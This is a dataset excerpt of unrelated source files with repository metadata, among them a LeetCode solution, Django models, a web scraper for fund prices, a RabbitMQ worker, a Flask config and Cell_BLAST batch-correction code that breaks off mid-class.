e71c2fa72058b5bcecd3babdb7ec56d2c90f205f | 8499de9ee574989f30f34a6b803b88423ece8f1e | /python/Arithmetic Slices.py | fd40ebbcf4d2c37781b08d9cef66fbcea302df31 | [] | no_license | aaaCcchaj/LeetCode | 0a1f16b10339728bba3a5e7db7dfa1bb6d2b520f | 25fbd1cb24df1a91616b3b93af3236c17f8a6bd0 | refs/heads/master | 2020-05-30T05:06:40.765450 | 2018-12-21T01:55:04 | 2018-12-21T01:55:04 | 41,406,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,136 | py | class Solution(object):
def numberOfArithmeticSlices(self, A):
chaList = []
for index in range(len(A) - 1):
chaList.append(A[index+1] - A[index])
chachaList = []
for chaIndex in range(len(chaList) - 1):
chacha = chaList[chaIndex + 1] - chaList[chaIndex]
chachaList.append(chacha)
zeroCounts = []
zeroCount = 0
for chachaIndex in range(len(chachaList)):
if(chachaList[chachaIndex] == 0 ):
zeroCount = zeroCount + 1
if chachaIndex == len(chachaList) - 1:
zeroCounts.append(zeroCount)
elif zeroCount > 0:
zeroCounts.append(zeroCount)
zeroCount = 0
allCount = 0
for cha in zeroCounts:
maxSliceCount = cha + 2
allCount = allCount + 1
for iter in range(3,maxSliceCount):
allCount = allCount + (maxSliceCount - iter +1 )
return allCount
s = Solution()
A = [0,0,0,0,0]
print s.numberOfArithmeticSlices(A) | [
"woaipan1023@gmail.com"
] | woaipan1023@gmail.com |
3e241bca87c1106e07b8d5ffd8e53da25cae808a | 8e1141fb8d9bf02d7e1c2fb887d66049d0860714 | /InvenTree/build/models.py | d09e7518785858212cb1d0f2ae5b953b0b916930 | [
"MIT"
] | permissive | ksanchezcld/InvenTree | 73ec392db5149814604e79690b465ae900af0c94 | ceea0533686305077c07c78ffa20ab4227ce2cf4 | refs/heads/master | 2023-02-28T10:07:02.741814 | 2018-05-12T02:44:29 | 2018-05-12T02:44:29 | 165,738,059 | 1 | 0 | MIT | 2023-02-11T19:31:42 | 2019-01-14T21:28:53 | JavaScript | UTF-8 | Python | false | false | 3,216 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.translation import ugettext as _
from django.db import models
from django.core.validators import MinValueValidator
class Build(models.Model):
""" A Build object organises the creation of new parts from the component parts
It uses the part BOM to generate new parts.
Parts are then taken from stock
"""
def get_absolute_url(self):
return '/build/{pk}/'.format(pk=self.id)
# Build status codes
PENDING = 10 # Build is pending / active
HOLDING = 20 # Build is currently being held
CANCELLED = 30 # Build was cancelled
COMPLETE = 40 # Build is complete
BUILD_STATUS_CODES = {PENDING: _("Pending"),
HOLDING: _("Holding"),
CANCELLED: _("Cancelled"),
COMPLETE: _("Complete"),
}
batch = models.CharField(max_length=100, blank=True, null=True,
help_text='Batch code for this build output')
# Status of the build
status = models.PositiveIntegerField(default=PENDING,
choices=BUILD_STATUS_CODES.items(),
validators=[MinValueValidator(0)])
# Date the build model was 'created'
creation_date = models.DateField(auto_now=True, editable=False)
# Date the build was 'completed'
completion_date = models.DateField(null=True, blank=True)
# Brief build title
title = models.CharField(max_length=100, help_text='Brief description of the build')
# A reference to the part being built
# Only 'buildable' parts can be selected
part = models.ForeignKey('part.Part', on_delete=models.CASCADE,
related_name='builds',
limit_choices_to={'buildable': True},
)
# How many parts to build?
quantity = models.PositiveIntegerField(default=1,
validators=[MinValueValidator(1)],
help_text='Number of parts to build')
# Notes can be attached to each build output
notes = models.TextField(blank=True)
@property
def required_parts(self):
parts = []
for item in self.part.bom_items.all():
part = {'part': item.sub_part,
'per_build': item.quantity,
'quantity': item.quantity * self.quantity
}
parts.append(part)
return parts
@property
def can_build(self):
""" Return true if there are enough parts to supply build
"""
for item in self.required_parts:
if item['part'].total_stock < item['quantity']:
return False
return True
@property
def is_active(self):
""" Is this build active?
An active build is either:
- Pending
- Holding
"""
return self.status in [
self.PENDING,
self.HOLDING
]
@property
def is_complete(self):
return self.status == self.COMPLETE
| [
"oliver.henry.walters@gmail.com"
] | oliver.henry.walters@gmail.com |
8a1faace4236c8808e8a2a695d9cd49f1bb4eb87 | 4e8876705ab0cbd8f2fdd500176f92a961ad3882 | /test.py | 90644a55adf50d79845eb994bbfdb54a337fc339 | [] | no_license | Jecosine/wcmonitor | 031c3940314fa6f2481864f498ed2cfaf2f663ba | 66089a0a7dcbaeb4db7653ed011aa8f7bfa1fda2 | refs/heads/master | 2020-03-27T10:29:27.027542 | 2018-08-29T13:56:35 | 2018-08-29T13:56:35 | 146,423,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 424 | py | import cv2
from PIL import Image
cap = cv2.VideoCapture(0)
count = 0
size = (int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_WIDTH)),int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT)))
writer = cv2.VideoWriter("a.avi",cv2.cv.CV_FOURCC("M","J","P","G"),20,(640,480))
while True:
if count >= 100:
break
_,frame = cap.read()
#frame = cv2.flip(frame,1)
writer.write(frame)
count += 1
cap.release()
writer.release()
| [
"mj_ol@outlook.com"
] | mj_ol@outlook.com |
a91cd2c4243b8a73856daf5edfc2383e9ed0c51a | 0619bc9e4fc97f99a8eed35aaa64976848ed3f18 | /src/MENIA_4.2-get_full_community_tags_recommend_record.py | f8d6d4c420585a5b665187dccafada58620b791d | [
"MIT"
] | permissive | SmartServiceGroup/SOworkspace | c7e04628e9dc2a2fd719c6661dfaadb19f1c9362 | 74bbcfa62c7e293b2b02f23249ac408aa22b44af | refs/heads/master | 2023-06-11T20:31:34.072302 | 2021-07-07T13:59:14 | 2021-07-07T13:59:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,285 | py | import json
from tqdm import tqdm
from collections import OrderedDict
from util.community_info.api_info_center import APIinfoCenter
from util.community_info.so_thread_info_center import ThreadInfoCenter
from util.config import COMMUNITY_RECORD_STORE_PATH, JAVADOC_GLOBAL_NAME, HOMURA_COMMUNITY_TAGS_RECOMMEND_STORE_PATH, API_THREAD_ID_MAP_STORE_PATH
'''
HOMURA系统中为了更好展示每个学习section的内容概况
分析生成了每个社群对应出现频率最高的几个tag
方便用户决策学习哪个
'''
def get_tag_recommend_list(api_community: list, info_center: ThreadInfoCenter, api_thread_id_map: dict) -> list:
if len(api_community) <= 1:
return None
related_thread_ids = set()
for api in api_community:
related_thread_ids.update(api_thread_id_map.get(api, []))
related_threads = info_center.batch_get_thread_detail_info(
list(related_thread_ids))
tag_count_map = {}
for thread in related_threads:
tags = thread['Tags'].strip('<').strip('>').split('><')
for tag in tags:
if tag == 'java':
continue
tag_count_map[tag] = tag_count_map.get(tag, 0) + 1
sorted_tags = [item[0] for item in sorted(
list(tag_count_map.items()), key=lambda x: x[1], reverse=True)]
if len(sorted_tags) > 10:
return sorted_tags[:10]
else:
return sorted_tags
def recommend_tags_for_each_community(doc_name: str = JAVADOC_GLOBAL_NAME):
with open(API_THREAD_ID_MAP_STORE_PATH[doc_name], 'r', encoding='utf-8') as rf_api:
api_thread_map = json.load(rf_api)
with open(COMMUNITY_RECORD_STORE_PATH[doc_name], 'r', encoding='utf-8') as rf:
api_communities = dict(json.load(rf))
recommend_result = OrderedDict()
thread_info_center = ThreadInfoCenter(doc_name)
for community_id, api_community in tqdm(list(api_communities.items())):
recommend_result[community_id] = get_tag_recommend_list(
api_community, thread_info_center, api_thread_map)
with open(HOMURA_COMMUNITY_TAGS_RECOMMEND_STORE_PATH[doc_name], 'w', encoding='utf-8') as wf:
json.dump(recommend_result, wf, indent=2, ensure_ascii=False)
if __name__ == "__main__":
recommend_tags_for_each_community(JAVADOC_GLOBAL_NAME)
| [
"yhang1996@126.com"
] | yhang1996@126.com |
57255f12107e6c6221c477520208776d0bd84806 | 8eada23d63e782bb53cab7ac7f9c39d17c53ab19 | /venv/bin/epylint | 53d422f995b67b1158d191c5b72131b1751f8088 | [] | no_license | bnsmcx/probable-guacamole | a34a4443366a9570b6427c127f7182ded8b23e90 | 07f14b12eaa1bca04cb1df4980c68fa34b74285a | refs/heads/master | 2023-05-14T13:23:01.378419 | 2021-06-14T15:34:48 | 2021-06-14T15:34:48 | 369,746,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | #!/home/ben/repos/probable-guacamole/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pylint import run_epylint
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run_epylint())
| [
"bnsmcx@protonmail.ch"
] | bnsmcx@protonmail.ch | |
968f81a4dc5b36969b0e07af25e2060611100b95 | 363f047a1bf8c5758f036b1de35c8d8c6b3ff6c2 | /FinalModel/Demo/Demo/custom_functions/__init__.py | bef8613cd41f4110dbca4043699969203d25e27f | [] | no_license | EnricRovira/TFM_DNN_Recomendator | 38c78dafd3ee9f9e672f6c3416bc75c912d08371 | d51ffadf47444270dbbaca0edcb24b3e5ebecd40 | refs/heads/master | 2023-05-24T18:43:38.753937 | 2019-09-02T21:28:09 | 2019-09-02T21:28:09 | 174,575,953 | 1 | 1 | null | 2023-05-22T22:16:04 | 2019-03-08T16:59:18 | Jupyter Notebook | UTF-8 | Python | false | false | 152 | py | #!/usr/bin/env python
# coding: utf-8
# Author: Enric Rovira Melendez
from .norm_text import *
from .norm_brands import *
from .norm_images import * | [
"noreply@github.com"
] | EnricRovira.noreply@github.com |
17777c20a723b74de11cf06efd95e6988c74a19c | d2294cf32832f0c546fcca64adda6d4f40dccd30 | /GPMmodulos/webapp/configs/config.py | 9a49bd68ebb9388cbdad06086b0d463be8b6aa21 | [] | no_license | Franq17/GPM | 2fa1640cf6fdf93d126f9dddb77f9ee5935631a9 | 3a98a2fd63c7a302b87574860da071bd530e556a | refs/heads/master | 2016-09-06T11:43:36.478442 | 2013-06-22T10:11:03 | 2013-06-22T10:11:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,868 | py | # -*- coding: utf-8 -*-
import os
class BaseConfig(object):
# Get app root path
# ../../configs/config.py
_basedir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
PROJECT = "webapp"
DEBUG = False
TESTING = False
ADMINS = frozenset(['youremail@yourdomain.com'])
# os.urandom(24)
SECRET_KEY = 'secret key'
class DevConfig(BaseConfig):
DEBUG = True
# ===========================================
# Flask-Sqlalchemy
#
# http://packages.python.org/Flask-SQLAlchemy/config.html
SQLALCHEMY_ECHO = True
# Database connection URI, change to suit yourself.
SQLALCHEMY_DATABASE_URI = 'postgresql://postgres:postgres@127.0.0.1/webapp2'
#SQLALCHEMY_DATABASE_URI = 'mysql://username:password@server/db' # mysql
# ===========================================
# Flask-babel
#
ACCEPT_LANGUAGES = ['zh']
BABEL_DEFAULT_LOCALE = 'en'
# ===========================================
# Flask-cache
#
CACHE_TYPE = 'simple'
CACHE_DEFAULT_TIMEOUT = 60
# ===========================================
# Flask-mail
#
# Should be imported from env var.
# https://bitbucket.org/danjac/flask-mail/issue/3/problem-with-gmails-smtp-server
MAIL_DEBUG = DEBUG
MAIL_SERVER = 'smtp.gmail.com'
MAIL_USE_TLS = True
MAIL_USE_SSL = False
MAIL_USERNAME = 'gmail_username'
MAIL_PASSWORD = 'gmail_password'
DEFAULT_MAIL_SENDER = '%s@gmail.com' % MAIL_USERNAME
# You should overwrite in production.py
# Limited the maximum allowed payload to 16 megabytes.
MAX_CONTENT_LENGTH = 16 * 1024 * 1024
USER_AVATAR_UPLOAD_FOLDER = os.path.join(BaseConfig._basedir, 'avatar')
class TestConfig(BaseConfig):
TESTING = True
CSRF_ENABLED = False
SQLALCHEMY_ECHO = False
SQLALCHEMY_DATABASE_URI = 'sqlite://'
| [
"franqur17@gmail.com"
] | franqur17@gmail.com |
0f5727ee0cc653a7879a3604cf38380e14e74e22 | 3fbc2ce251aa2325a76248f0fe355d4ed0487720 | /Living_example/Cel_2_Fah.py | 5cc7a4d783da51bb9b7e36e672de08577d6723ac | [] | no_license | Jenychen1996/Basic-Python-FishC.com | 4c3aab1b98b2d3e55da51523222440c4bf260864 | 191823e05510f6a198847673cf9eba2c480e15f4 | refs/heads/master | 2020-05-04T13:03:25.292555 | 2019-04-14T18:13:38 | 2019-04-14T18:13:38 | 179,146,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 838 | py | # -*- coding:utf-8 -*-
"""
定义一个类实现摄氏度到华氏度的转换(转换公式:华氏度 = 摄氏度*1.8+32)
"""
class C2F(float):
def __new__(cls, arg=0.0):
return float.__new__(cls, arg * 1.8 + 32)
print(C2F(32))
class Celsius:
def __init__(self, value=26.0):
self.value = value
def __get__(self, instance, owner):
return self.value
def __set__(self, instance, value):
self.value = float(value)
class Fahrenheit:
def __get__(self, instance, owner):
return instance.cel * 1.8 + 32
def __set__(self, instance, value):
instance.cel = (float(value) - 32) / 1.8
class Temperature:
cel = Celsius()
fah = Fahrenheit()
temp = Temperature()
print(temp.cel)
print(temp.fah)
temp.cel = 30
print(temp.fah)
temp.fah = 100
print(temp.cel)
| [
"2057359164@qq.com"
] | 2057359164@qq.com |
974c0b225a53e22236f988a12015c3e45a4257bf | ecb0d14498e266fddf108f81bb1ea28d80dbd9f9 | /internal/chandlerdb/chandlerdb/schema/Alias.py | d1f94fbc8c67c3d2f5803a7722b0b4aa627d39ab | [] | no_license | Tadashi-Hikari/Chandler-Junkyard | 9674101cdbee20c37052cbdde3fba75e0815756f | 9b436bc5607c63f24f915a9e1753f55ccbff523f | refs/heads/master | 2023-04-06T11:23:02.168125 | 2021-04-08T01:58:50 | 2021-04-08T01:58:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,094 | py | # Copyright (c) 2003-2007 Open Source Applications Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from chandlerdb.util.c import _hash, _combine
from chandlerdb.schema.c import CAttribute
from chandlerdb.schema.Types import Type
from chandlerdb.schema.TypeHandler import TypeHandler
class Alias(Type):
def getImplementationType(self):
return None
def isAlias(self):
return True
def getFlags(self):
flags = CAttribute.ALIAS
if 'types' in self._references:
for t in self._references['types']:
flags |= t.getFlags()
else:
flags |= CAttribute.PROCESS
return flags
def type(self, value):
if 'types' in self._references:
for t in self._references['types']:
if t.recognizes(value):
return t
else:
return TypeHandler.typeHandler(self.itsView, value)
return None
def recognizes(self, value):
if 'types' not in self._references:
return True
for t in self.types:
if t.recognizes(value):
return True
return False
def typeXML(self, value, generator):
if 'types' not in self._references:
super(Alias, self).typeXML(value, generator)
return
for t in self.types:
if t.recognizes(value):
t.typeXML(value, generator)
return
raise TypeError, "value '%s' of type '%s' unrecognized by %s" %(value, type(value), self.itsPath)
def writeValue(self, itemWriter, record, item, version, value, withSchema):
if 'types' not in self._references:
return super(Alias, self).writeValue(itemWriter, record, item,
version, value, withSchema)
for t in self.types:
if t.recognizes(value):
return t.writeValue(itemWriter, record, item,
version, value, withSchema)
raise TypeError, "value '%s' of type '%s' unrecognized by %s" %(value, type(value), self.itsPath)
def hashItem(self):
"""
Compute a hash value from this aliase's schema.
The hash value is computed from the aliase's path and types.
@return: an integer
"""
hash = _hash(str(self.itsPath))
if 'types' in self._references:
for t in self.types:
hash = _combine(hash, t.hashItem())
return hash
| [
"vajda@3c49585b-f0f7-0310-b5f9-dfe92a88fbfe"
] | vajda@3c49585b-f0f7-0310-b5f9-dfe92a88fbfe |
f53bd2fa1b9e25a2b4a125217ad09295c26c3dc9 | e7c28ce96a6e706138a50d858d82878bb65c6a93 | /腾讯基金净值中心-His.py | f4771c86452bdd388ebf0bdc19a3e3a79277bf7c | [] | no_license | xiaotong9005/tongyun | 86b9e5c97d166f1785036ab3fffd85d50f316e7b | dfab95db5fe9bb38ee30eb563d2847647f73cc3d | refs/heads/master | 2021-08-19T21:57:04.407623 | 2017-11-27T14:06:11 | 2017-11-27T14:06:11 | 111,663,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,516 | py | import requests
import pyodbc
from bs4 import BeautifulSoup
def transf(a,b):
if a=='--':
return(b)
else:
return(a)
headers={
'Accept':'*/*',
'Accept-Encoding':'gzip, deflate',
'Accept-Language':'zh-CN,zh;q=0.8',
'Connection':'keep-alive',
'Cookie':'tvfe_boss_uuid=5e27e9f9701779d7; pac_uid=1_2675059005; _gscu_661903259=79824025jlu8xj64; RK=GIdvB2Bv/C; pgv_pvi=2648977408; UM_distinctid=15cd7d528361a5-0902ce33389b2a-3715834-100200-15cd7d52837ef; ts_uid=8007293614; ts_refer=www.baidu.com/link; ts_uid=8007293614; RECENT_CODE=000737_51%7C603129_1%7C164906_51%7C161219_51%7C160716_51%7C000876_51%7C601857_1%7C600104_1%7C000988_0%7C000193_0%7C100022_0%7C001781_0%7C165521_0%7C162214_0%7C000898_51%7C399550_51%7C070032_0%7C001852_0%7C000969_0%7C001728_0%7C150276_51%7C16181L_0; dm_login_weixin_rem=; dm_login_weixin_scan=; logout_page=; ptcz=5c8223be0ba5004c0268b6238147a7e3d5e2dcfcac5d1662006b9feecc402eba; pt2gguin=o2675059005; mbCardUserNotLoginTips=1; pgv_info=ssid=s8630159920; pgv_pvid=7066792342; o_cookie=2675059005',
'Host':'stock.finance.qq.com',
'Referer':'http://stockhtm.finance.qq.com/fund/jzzx/index.htm',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 UBrowser/6.1.3397.16 Safari/537.36'
}
db=pyodbc.connect('DRIVER={SQL Server};SERVER=localhost;PORT=1433;DATABASE=symbol;UID=sa;PWD=xiaotong123')
cur=db.cursor()
datelist=[]
qsql="select [dateid] from [symbol].[dbo].[date] where dateid<='20150530'"
try:
cur.execute(qsql)
results=cur.fetchall()
for row in results:
datelist.append(row[0])
except:
print('DateList获取失败')
for i in datelist:
url="http://stock.finance.qq.com/cgi-bin/fund/jzzx_d?fm=js&d="+i+""
#print(url,end='...')
res=requests.get(url,headers=headers)
datastr=BeautifulSoup(res.text,'html.parser').text
a=datastr.find('var v_kfs=')+len('var v_kfs=')#字符串开头无用的字符开始位置
c=datastr.find(';/*')#字符串结束无用的字符开始位置
datastr=eval(datastr[a:c])
num=1
for code in datastr:
#print(num,end=' ')
if code[0]in ('001275'):#提取之针对某个基金
sql='''
declare @count int
select @count=count(*)
from [基金净值中心_HIS]
where [基金代码]='%s'
and [净值日期]='%s'
if @count=0
begin
insert into [基金净值中心_HIS] ([基金代码],[简称],[单位净值],[涨跌],[增长率],[累计净值],[净值日期])
values('%s','%s',%s,%s,%s,%s,'%s')
end
'''%(code[0],code[6],code[0],code[1],transf(code[2],0),transf(code[3],0),transf(code[4],0),transf(code[5],0),code[6])
try:
cur.execute(sql)
db.commit()
print(code[0],code[6],'数据提取成功,简称:',code[1])
except:
db.rollback()
print(code[0],'数据提取失败,简称:',code[1])
num=num+1
db.close()
| [
"2675059005@qq.com"
] | 2675059005@qq.com |
3b81da56caa93e61d28fabd2fb15cbe2d6049842 | af6feb644d2435e1d656556261e5e100209beb1c | /helper/show_pred.py | 3e501e41b0d01880007c112e02a8e8be86dcecf8 | [
"MIT"
] | permissive | liusida/TorchServe_FaceLandmark_Example | f2ca5d1e9cde2eed340ce46584a06cb0e16ef4ac | 1e854f2f82874255b59ca27b19d3a3254fe69636 | refs/heads/main | 2023-04-26T16:25:18.421724 | 2021-05-26T03:25:00 | 2021-05-26T03:25:00 | 370,864,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,081 | py | import collections
import matplotlib.pyplot as plt
def show_pred(preds, input_img, only_2d=True, filename=None):
# 2D-Plot
plot_style = dict(marker='o',
markersize=4,
linestyle='-',
lw=2)
pred_type = collections.namedtuple('prediction_type', ['slice', 'color'])
pred_types = {'face': pred_type(slice(0, 17), (0.682, 0.780, 0.909, 0.5)),
'eyebrow1': pred_type(slice(17, 22), (1.0, 0.498, 0.055, 0.4)),
'eyebrow2': pred_type(slice(22, 27), (1.0, 0.498, 0.055, 0.4)),
'nose': pred_type(slice(27, 31), (0.345, 0.239, 0.443, 0.4)),
'nostril': pred_type(slice(31, 36), (0.345, 0.239, 0.443, 0.4)),
'eye1': pred_type(slice(36, 42), (0.596, 0.875, 0.541, 0.3)),
'eye2': pred_type(slice(42, 48), (0.596, 0.875, 0.541, 0.3)),
'lips': pred_type(slice(48, 60), (0.596, 0.875, 0.541, 0.3)),
'teeth': pred_type(slice(60, 68), (0.596, 0.875, 0.541, 0.4))
}
fig = plt.figure(figsize=plt.figaspect(.5))
ax = fig.add_subplot(1, 1 if only_2d else 2, 1)
ax.imshow(input_img)
for pred_type in pred_types.values():
ax.plot(preds[pred_type.slice, 0],
preds[pred_type.slice, 1],
color=pred_type.color, **plot_style)
ax.axis('off')
if not only_2d:
# 3D-Plot
ax = fig.add_subplot(1, 2, 2, projection='3d')
surf = ax.scatter(preds[:, 0] * 1.2,
preds[:, 1],
preds[:, 2],
c='cyan',
alpha=1.0,
edgecolor='b')
for pred_type in pred_types.values():
ax.plot3D(preds[pred_type.slice, 0] * 1.2,
preds[pred_type.slice, 1],
preds[pred_type.slice, 2], color='blue')
ax.view_init(elev=90., azim=90.)
ax.set_xlim(ax.get_xlim()[::-1])
if filename:
plt.savefig(filename)
else:
plt.show()
| [
"sliu1@uvm.edu"
] | sliu1@uvm.edu |
ccf168d72c282c2859a790895709e0783e39b3d3 | 6556f14abd6d910b1eded20b5419d07b2d8b4a91 | /code/spec_lib.py | 903bee9568ca94d404292fe293f9706084e35008 | [] | no_license | sdrogers/molnet | 42ca6c8e5392dd576c65d4461b028b1f0c677eb7 | 2d7746f86df65638fc3fef7dfc53e83e1a042840 | refs/heads/master | 2020-03-25T20:17:57.504641 | 2019-10-08T19:37:58 | 2019-10-08T19:37:58 | 144,124,994 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,001 | py | # some code for spectral library things
MOLNET_PATH = '/Users/simon/git/molnet/code'
import sys
sys.path.append(MOLNET_PATH)
from scoring_functions import fast_cosine,fast_cosine_shift
class SpecLib(object):
def __init__(self,mgf_file):
self.mgf_file = mgf_file
self.spectra = None
def _load_mgf(self,id_field='SPECTRUMID'):
from mnet_utilities import load_mgf
self.spectra = load_mgf(self.mgf_file,id_field = id_field)
for k,v in self.spectra.items():
v.spectrum_id = k
def get_n_spec(self):
return len(self.spectra)
def get_keys(self):
return list(self.spectra.keys())
def get_n_peaks(self):
return [s.n_peaks for s in self.spectra.values()]
def filter(self):
# top_k_filter
n_done = 0
for s_id,spec in self.spectra.items():
spec.keep_top_k()
n_done += 1
if n_done % 100 == 0:
print("Filtered {}".format(n_done))
def spectral_match(self,query,
scoring_function = fast_cosine,
ms2_tol = 0.2,
min_match_peaks = 1,
ms1_tol = 0.2,
score_thresh = 0.7):
# make a sorted list for quick precursor matching
spec_list = [s for s in self.spectra.values()]
spec_list.sort()
candidates = self._candidates(spec_list,query.precursor_mz,ms1_tol)
hits = []
for c in candidates:
sc,_ = scoring_function(query,c,ms2_tol,min_match_peaks)
if sc >= score_thresh:
hits.append((c.spectrum_id,sc))
return hits
def _candidates(self,mz_list,query_mz,ms1_tol):
from sortedcontainers import SortedList
pmz_list = SortedList([m.precursor_mz for m in mz_list])
lower = query_mz - ms1_tol
upper = query_mz + ms1_tol
start = pmz_list.bisect(lower)
end = pmz_list.bisect(upper)
return mz_list[start:end]
| [
"simon.d.rogers@gmail.com"
] | simon.d.rogers@gmail.com |
10bf514a20f40a187f52119fd1bd1155a820dacb | f029e4ae41336c6f7ea2a7b06a134e0038fa3a72 | /workers/rabbit_worker.py | 01dc6f494a1dc2122ed978317a7869af482a8105 | [] | no_license | KaltakhchyanD/flask_message_queueueue | 78b9cab8eb7c83e37a7838551ce7712d747da85d | f3110ca4cfa19451d75a7f832529ac3214fc8154 | refs/heads/master | 2023-03-03T14:33:50.746055 | 2021-02-13T13:55:53 | 2021-02-13T13:55:53 | 293,317,563 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,344 | py | import datetime
import json
import os
import random
import time
import pika
def run_worker():
worker = RabbitWorker()
class RabbitWorker:
def __init__(self, worker_name="that_default_worker"):
self.task_number_from_worker = 0
self.worker_name = worker_name
# Sleep for 20 sec to ensure that rabbit server started
print(" [*] Sleeping for 40 seconds.")
time.sleep(40)
print(" [*] After sleep")
print(" [*] Connecting to server ...")
self.user = os.getenv("RABBIT_USER")
self.password = os.getenv("RABBIT_PASSWORD")
self.host = os.getenv("RABBIT_HOST")
self.credentials = pika.PlainCredentials(self.user, self.password)
self.connection = pika.BlockingConnection(
pika.ConnectionParameters(host=self.host, credentials=self.credentials)
)
self.channel = self.connection.channel()
print(f" [?] Channel at RabbitWorker : {self.channel}")
print(f" [?] IS IT OPEN : {self.channel.is_open}")
# print(f" [?] ITS DIR : {dir(self.channel)}")
print(f" [?] ITS NUMBER : {self.channel.channel_number}")
# Declare default queue to get messages from RabbitClient
self.channel.queue_declare(queue="message_q_0", durable=True)
self.channel.queue_declare(queue="message_q_1", durable=True)
self.channel.queue_declare(queue="message_q_2", durable=True)
## Declare queue that contains messages for worker
## to declare to newly created queue
## So queues can be created at RabbitClient
## and then worker can declare it to and start consuming
# queue_to_create_queues = "create_queue"
##self.rabbit_queue_list.append(queue_to_create_queues)
# self.channel.queue_declare(queue=queue_to_create_queues, durable=True)
def callback(ch, method, properties, body):
print(f" [x] Received {body} of id {properties.correlation_id}")
with open("temp.txt", "a") as file:
file.write(f"{datetime.datetime.now()} \n")
random_delay = random.randint(10, 20)
print(f" [x] Delaing for {random_delay} sec")
time.sleep(random_delay)
print(f"Num - {self.task_number_from_worker}")
self.task_number_from_worker += 1
new_body = (
body.decode() + f" {self.task_number_from_worker}, from {worker_name}"
)
new_body = new_body.encode()
ch.basic_publish(
exchange="",
routing_key=properties.reply_to,
body=new_body,
properties=pika.BasicProperties(
correlation_id=properties.correlation_id
),
)
ch.basic_ack(delivery_tag=method.delivery_tag)
self.channel.basic_qos(prefetch_count=1)
self.channel.basic_consume(queue="message_q_0", on_message_callback=callback)
self.channel.basic_consume(queue="message_q_1", on_message_callback=callback)
self.channel.basic_consume(queue="message_q_2", on_message_callback=callback)
print(" [*] Waiting for messages. To exit press CTRL+C")
self.channel.start_consuming()
print("End of worker")
if __name__ == "__main__":
run_worker()
| [
"rafikrafikrafik@yandex.ru"
] | rafikrafikrafik@yandex.ru |
97a317fe145ad1ecc4ed62bd7143ced9eb3b62be | 7096272d59082433d4d3852b9969e6ddce06d928 | /Artificial Intelligence/laptopbatterylife.py | 7a109c0a563d141c65dc81d7ca0681eb3fecf110 | [] | no_license | sanjanprakash/Hackerrank | 5b9c8e6a926e2555ebfa738d2eaed738000e52c1 | 94b20021b9e931fbb6746da324d0871dd371b42c | refs/heads/master | 2020-03-27T20:00:45.435682 | 2019-06-14T02:56:25 | 2019-06-14T02:56:25 | 147,030,844 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | import numpy as np
x,y = [],[]
with open("trainingdata.txt", "r") as filestream:
for line in filestream :
currentline = line.split(",")
if (float(currentline[1]) < 8.0) :
x.append(float(currentline[0]))
y.append(float(currentline[1]))
m,b = np.polyfit(x,y,1)
inp = float(raw_input())
if (2 * inp >= 8.0) :
print "8.00"
else :
print round(m*inp + b,2)
| [
"noreply@github.com"
] | sanjanprakash.noreply@github.com |
c97124271bc6733cf52b3bba45b66aac83594937 | c50598d4ce8e6c906748021060f1df84e16372ca | /Cell_BLAST/rmbatch.py | 655f033ddd7728aabe6e52fbaf541a4df57fa836 | [
"MIT"
] | permissive | BacemDataScience/Cell_BLAST | f4407571e321fbc6aeb8642a994767e6e1f381fa | d0e25fa695cb8cebcba68dd32fe5e7e96743803f | refs/heads/master | 2020-09-10T02:31:00.758648 | 2019-09-28T16:06:55 | 2019-09-28T16:06:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,479 | py | """
Batch effect removing modules for DIRECTi
"""
import tensorflow as tf
from . import nn
from . import module
from . import utils
class RMBatch(module.Module):
"""
Parent class for systematical bias / batch effect removal modules.
"""
def __init__(self, batch_dim, delay=20, name="RMBatch"):
super(RMBatch, self).__init__(name=name)
self.batch_dim = batch_dim
self.delay = delay
if self._delay_guard not in self.on_epoch_end:
self.on_epoch_end.append(self._delay_guard)
def _build_regularizer(self, input_tensor, training_flag, epoch, scope=""):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(
dtype=tf.float32, shape=(None, self.batch_dim),
name=self.scope_safe_name
)
return 0.0
def _build_feed_dict(self, data_dict):
return {
self.batch: utils.densify(data_dict[self.name])
} if self.name in data_dict else {}
def __bool__(self):
return True
def _get_config(self):
return {
"batch_dim": self.batch_dim,
"delay": self.delay,
**super(RMBatch, self)._get_config()
}
def _delay_guard(self, model, train_data_dict, val_data_dict, loss):
_epoch = model.sess.run(model.epoch)
return _epoch >= self.delay
class Adversarial(RMBatch):
"""
Build a batch effect correction module that uses adversarial batch alignment.
Parameters
----------
batch_dim : int
Number of batches.
h_dim : int
Dimensionality of the hidden layers in the discriminator MLP, by default 128.
depth : int
Number of hidden layers in the discriminator MLP, by default 1.
dropout : float
Dropout rate, by default 0.0.
lambda_reg : float
Strength of batch effect correction, by default 0.01,
n_steps : int
How many discriminator steps to run for each encoder step, by default 1.
name : str
Name of the module, by default "AdvBatch".
"""
